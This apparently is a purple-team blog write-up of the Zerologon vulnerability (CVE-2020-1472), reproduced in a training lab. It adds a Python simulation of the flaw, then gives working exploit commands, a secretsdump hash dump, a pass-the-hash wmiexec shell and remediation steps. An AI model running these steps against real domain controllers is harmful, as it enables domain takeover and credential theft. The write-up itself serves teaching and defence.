CVE-2020-1472 (Zerologon Vulnerability) - Exploitation & Remediation

Zerologon (CVE-2020-1472) Vulnerability

NOTE: This is my first vulnerability-related writeup and I have tried to write and explain in layman terms. There may be knowledge gaps in between, which I am trying my hardest to cover and understand

I have tried to reproduce the vulnerability in this blog entry, while trying to understand its severity and impact.

Section 1 — Exploiting the Zerologon Vulnerability (CVE-2020-1472)

About the Vulnerability

Netlogon is a service that runs on every Domain Controller. It maintains the secure channel that domain-joined computers use to authenticate users and to talk to the domain, so it is effectively the component that verifies a user or computer is who it claims to be. Because this is a core function of a Domain Controller, the Netlogon RPC interface (MS-NRPC) cannot be stopped or firewalled off from the networks that domain-joined computers sit on.

  • CVSS v3.1 base score — 10.0 (vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

  • Attack Complexity — Low

  • Privileges Required — None (an unauthenticated attacker with network access to the Domain Controller is enough)

  • Vulnerability Found — July 2020

Exploitable Point

The Netlogon RPC service (MS-NRPC), used for computer and user authentication in Windows, also lets a computer change its own machine-account password in the domain. For historical reasons this service does not use a standard authentication protocol such as Kerberos to authenticate the computer; it uses a custom challenge-response handshake in which each side proves knowledge of a session key derived from the machine-account password. The vulnerability is in that custom scheme. The credential is computed with AES-128 in CFB8 mode under the session key, with the initialization vector fixed to all zeros. For roughly one session key in 256, encrypting an all-zero client challenge under that zero IV produces an all-zero credential, so an attacker who sends a zero challenge and a zero credential, and simply reconnects until a favourable session key comes up (about 256 attempts on average, a few seconds in practice), is authenticated as the machine without knowing any secret. The client also declines RPC signing and sealing, which the server permits. The same keystream property makes an all-zero encrypted password blob decrypt to zeros, so the attacker can then call NetrServerPasswordSet2 and set the machine account's password to an empty string.

Twitter thread providing a nice walkthrough — https://twitter.com/_dirkjan/status/1306280553281449985
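To see why the handshake can be brute-forced, here is an added Python simulation of the credential computation written for this write-up; it is not code from the page, from Secura, or from dirkjanm's repository. It assumes a SHA-256-based PRF in place of AES-128 so that it runs with the standard library only (CFB8 uses only the forward direction of the cipher, and the flaw depends only on the first keystream byte being uniform, so the behaviour is the same); the function names zerologon_authenticate, password_set_with_zero_blob and seeded_key_source are this example's own, not MS-NRPC's. It goes one step beyond the description above by also decoding the NL_TRUST_PASSWORD buffer, which shows why a 516-byte all-zero blob becomes an empty password.

```python
"""Simulation of the Zerologon flaw: Netlogon computes the client credential
with AES-128 in CFB8 mode under the session key, with the IV fixed to all
zeros. With an all-zero challenge, one session key in 256 turns that into an
all-zero credential, so an attacker who knows no secret can guess "0" and
simply reconnect until such a key comes up."""
import hashlib
import random

BLOCK_SIZE = 16
ZERO_IV = bytes(BLOCK_SIZE)


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # ASSUMPTION: a SHA-256-based PRF stands in for AES-128 so this file needs
    # no third-party library; CFB8 only ever uses the forward direction.
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: each output byte is p ^ E_k(shift)[0]; the ciphertext byte is then
    shifted into the register. A zero IV makes the first keystream byte E_k(0)[0]."""
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(shift))[0]
        out.append(c)
        shift = shift[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    shift = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        out.append(c ^ block_encrypt(key, bytes(shift))[0])
        shift = shift[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    # MS-NRPC ComputeNetlogonCredential, AES flavour: CFB8 with a zero IV (the bug).
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def is_weak_session_key(session_key: bytes) -> bool:
    # If E_k(0)[0] == 0x00 the shift register never leaves the all-zero state,
    # so every keystream byte is 0x00 and zeros encrypt (and decrypt) to zeros.
    return block_encrypt(session_key, ZERO_IV)[0] == 0


def zerologon_authenticate(session_key_source, max_attempts=10000):
    """Attacker sends client challenge 0^8 and client credential 0^8 on every
    try. Each NetrServerReqChallenge/NetrServerAuthenticate3 round yields a
    fresh session key, drawn here from session_key_source(). Returns
    (attempts, key) on success or (max_attempts, None) if no weak key appeared."""
    client_challenge = bytes(8)
    guessed_credential = bytes(8)
    for attempt in range(1, max_attempts + 1):
        session_key = session_key_source()
        if compute_netlogon_credential(session_key, client_challenge) == guessed_credential:
            return attempt, session_key
    return max_attempts, None


def decode_nl_trust_password(blob: bytes) -> str:
    """NL_TRUST_PASSWORD: 512-byte buffer followed by a 4-byte little-endian
    Length; the password is the last Length bytes of the buffer, UTF-16LE."""
    if len(blob) != 516:
        raise ValueError("NL_TRUST_PASSWORD must be 516 bytes")
    length = int.from_bytes(blob[512:], "little")
    if length > 512:
        raise ValueError("garbage length field: session key was not weak")
    return blob[512 - length:512].decode("utf-16-le")


def password_set_with_zero_blob(session_key: bytes) -> str:
    """NetrServerPasswordSet2 step: the attacker sends 516 zero bytes as the
    'encrypted' new password. Under a weak session key that decrypts to all
    zeros, i.e. Length = 0, so the machine-account password becomes empty."""
    return decode_nl_trust_password(cfb8_decrypt(session_key, ZERO_IV, bytes(516)))


def seeded_key_source(seed: int):
    """Deterministic 128-bit session keys so a run is reproducible."""
    rng = random.Random(seed)
    return lambda: rng.getrandbits(128).to_bytes(16, "big")


def weak_key_count(trials: int, seed: int) -> int:
    """How many of `trials` random session keys are weak (expect about trials/256)."""
    source = seeded_key_source(seed)
    return sum(is_weak_session_key(source()) for _ in range(trials))


if __name__ == "__main__":
    attempts, key = zerologon_authenticate(seeded_key_source(2020))
    print(f"authenticated as the machine account after {attempts} attempts")
    print("new machine-account password:", repr(password_set_with_zero_blob(key)))
    print("weak keys among 10000:", weak_key_count(10000, 1))
```

Run it directly to watch the attacker get in after a few hundred reconnects and end up with an empty machine-account password; the weak-key count over 10,000 keys lands near 39 (10,000/256), which is the whole reason the retry loop in the real exploit finishes in seconds.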

Exploitation Walkthrough

What do you need?

  • Impacket — to authenticate to the Domain Controller and dump its password hashes

  • A vulnerable (unpatched) Windows Server Domain Controller, the host on which the Netlogon service runs

  • An attacker VM (Kali in this walkthrough) to run the exploit from, using RangeForce’s ZeroLogon Vulnerability Lab (Guided Mode)

First, let’s clone the impacket repository from Github

Steps to install (clone, then run pip install from inside the cloned directory so the library and its example scripts work):

git clone https://github.com/SecureAuthCorp/impacket.git

Now, let’s also fetch the exploit script, cve-2020-1472-exploit.py, from GitHub.

Credits to dirkjanm.

https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py

Save the exploit under impacket/examples/CVE-2020-1472/ inside the cloned repository.

Now, let’s switch to this directory

By now, we have identified the following details about the vulnerable Domain Controller:

NetBIOS computer name: DC

IP address: 192.168.0.4

Syntax of the exploit command: ./cve-2020-1472-exploit.py -n <NetBIOS computer name> -t <IP address>

Now to run the script and exploit:

./cve-2020-1472-exploit.py -n DC -t 192.168.0.4

What does this exploit do?

It first authenticates to the Netlogon service as the Domain Controller’s own machine account (DC$) without knowing its password, by retrying the handshake with an all-zero challenge and credential until the session key happens to make that combination valid (on average 256 attempts). It then calls NetrServerPasswordSet2 and sets the DC$ machine-account password in Active Directory to an empty string.

The gist: your Domain Controller’s machine account now has a blank password, and anyone who can reach the DC over the network can use it.

Next objective — dump password hashes from the Domain Controller

For this we need the domain name, the Domain Controller’s NetBIOS name and the IP address of the vulnerable host.

We make use of the secretsdump.py module from Impacket to perform this task. Because the DC$ password is now empty we authenticate with -no-pass, and -just-dc restricts the dump to the domain secrets held in NTDS.DIT.

Password dump command syntax: python3 secretsdump.py -no-pass -just-dc <DOMAIN>/<NETBIOS_NAME>\$@<IP_ADDRESS>

(This command does not work when invoked directly with ./ ; run it through python3.)

Filling in the blanks:-

python3 secretsdump.py -no-pass -just-dc CONTOSO.AZURE/DC\$@192.168.0.4

This dumps around 60 password hashes from NTDS.DIT; every account is listed as name:RID:LM hash:NT hash.

Next objective — logging on as ContosoAdmin (the domain admin’s account) using that account’s dumped hash. This is pass-the-hash, so no cracking is needed.

Scrolling through the dumped list, we find the appropriate entry.

Logging on to the server using the wmiexec.py module:

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a2bd759faf686d052f5f7c8337a2ff51 CONTOSO.AZURE/DC\$@192.168.0.4

Note that this command authenticates with the DC$ machine account and the hash copied from the dump. To log on as ContosoAdmin instead, use CONTOSO.AZURE/ContosoAdmin@192.168.0.4 with that account’s LM:NT pair from the same list; in either case the -hashes value is LMHASH:NTHASH exactly as secretsdump prints it.

We are in!

Section 2 — Remediating the Vulnerability

How?

  • Manually restoring the machine-account password. This is needed whenever the exploit has already run: patching stops further exploitation but does not put the Domain Controller’s original password back. (or)

  • Installing the August 2020 Patch Tuesday update on every Domain Controller (the initial deployment phase of the fix) and the February 2021 update that begins the enforcement phase, in which DCs reject vulnerable Netlogon secure-channel connections from all devices. Between the two phases you can turn enforcement on early by setting the FullSecureChannelProtection registry value to 1 under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters, and you can watch the System log for Netlogon events 5827 to 5831, which record vulnerable connections that were denied or still allowed.

Manual Password Restore — How does it work?

When the exploit runs, the DC$ machine-account password held in Active Directory (NTDS.dit on the Domain Controller) is replaced with an empty string, which is why the DC$ entry in the dump shows the NT hash of the empty password. The Domain Controller also keeps its own local copy of that password, as the $MACHINE.ACC entry in the LSA secrets of its SECURITY registry hive (protected with the boot key from the SYSTEM hive). The exploit does not touch that copy, and it is what we use to recover the original.

So, using the blank DC$ password we already have, we log on to the Domain Controller, save the SAM, SYSTEM and SECURITY hives, copy them to the Kali VM, and then delete the copies from the Domain Controller so that we do not leave its secrets lying around.

These steps are carried out from the wmiexec shell we opened above. Once the hives are copied, exit that shell (exit) to get back to the Kali machine.

The next task is to parse the hives copied from the Domain Controller with secretsdump.py in LOCAL mode, which recovers the $MACHINE.ACC secret, i.e. the DC’s original machine-account password.

Recovered password hash — 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Now to place the final piece of the jigsaw: restoring the original password. For that, the lab provides a customised script named reinstall_original_pw.py.

Syntax — reinstall_original_pw.py <DC_NETBIOS_NAME> <DC_IP_ADDR> <ORIG_NT_HASH>

Filling in the blanks here,

./reinstall_original_pw.py DC 192.168.0.4 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Conclusion

This is an easy vulnerability to exploit: low complexity, no credentials required, and a target service that cannot simply be switched off, because we still depend on these systems to administer the domain. It may be disputed, but 100% security is probably a myth unless drastic action is taken to respond to and patch even the slightest of issues.

Thank you for the time taken to devour this purple team blog entry.

Your opinion matters

My audience has a voice. Feel free to reach out to me, on my socials (links are on top of this page) for any queries to be addressed. Dropping a sweet message would make my day

